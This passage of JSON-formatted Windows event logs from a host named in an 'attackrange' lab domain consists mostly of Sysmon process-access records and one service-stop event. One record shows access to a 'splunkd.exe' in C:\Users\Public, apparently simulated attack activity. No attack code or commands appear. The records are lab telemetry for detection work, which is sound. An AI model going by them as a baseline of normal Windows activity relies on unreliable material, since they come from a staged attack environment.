\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4208,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4209,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4210,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4211,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4212,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1112\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1112","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:01","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4213,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:01.808\r\nSourceProcessGUID: {E2A3D6B1-1103-5F25-0000-0010F6780500}\r\nSourceProcessId: 3336\r\nSourceThreadId: 1980\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-0010AFFE0500}\r\nTargetProcessId: 3144\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:01.808","SourceProcessGUID":"{E2A3D6B1-1103-5F25-0000-0010F6780500}","SourceProcessId":"3336","SourceThreadId":"1980","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-0010AFFE0500}","TargetProcessId":"3144","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winprintmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:02","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4214,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:02.434\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001054C00200}\r\nSourceProcessId: 2116\r\nSourceThreadId: 3584\r\nSourceImage: C:\\Program Files (x86)\\nxlog\\nxlog.exe\r\nTargetProcessGUID: {E2A3D6B1-1061-5F25-0000-001069980200}\r\nTargetProcessId: 2308\r\nTargetImage: C:\\Users\\Public\\splunkd.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:02.434","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3584","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 06:52:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:02","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9187343239835811840,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":7036,"SourceName":"Service Control Manager","ProviderGuid":"{555908D1-A6D7-4695-8E1E-26931D2012F4}","Version":0,"Task":0,"OpcodeValue":0,"RecordNumber":76859,"ProcessID":852,"ThreadID":936,"Channel":"System","Message":"The Network Setup Service service entered the stopped state.","param1":"Network Setup Service","param2":"stopped","EventReceivedTime":"2020-08-01 06:52:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:52:03","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4215,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:52:03.059\r\nSourceProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nSourceProcessId: 2928\r\nSourceThreadId: 3388\r\nSourceImage: C:\\Windows\\sysmon64.exe\r\nTargetProcessGUID: {E2A3D6B1-1111-5F25-0000-001045FA0500}\r\nTargetProcessId: 3068\r\nTargetImage: C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\sysmon64.exe+2515c|C:\\Windows\\sysmon64.exe+1b75d|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:52:03.059","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","SourceProcessId":"2928","SourceThreadId":"3388","SourceImage":"C:\\Windows\\sysmon64.exe","TargetProcessGUID":"{E2A3D6B1-1111-5F25-0000-001045FA0500}","TargetProcessId":"3068","TargetImage":"C:\\Program Files\\SplunkUniversalForwarder\\bin\\splunk-winevtlog.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|C:\\Windows\\sysmon64.exe+2515c|C:\\Windows\\sysmon64.exe+1b75d|C:\\Windows\\sysmon64.exe+1bb9f|C:\\Windows\\sysmon64.exe+1bcb5|C:\\Windows\\sysmon64.exe+a7d09|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:52:03","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
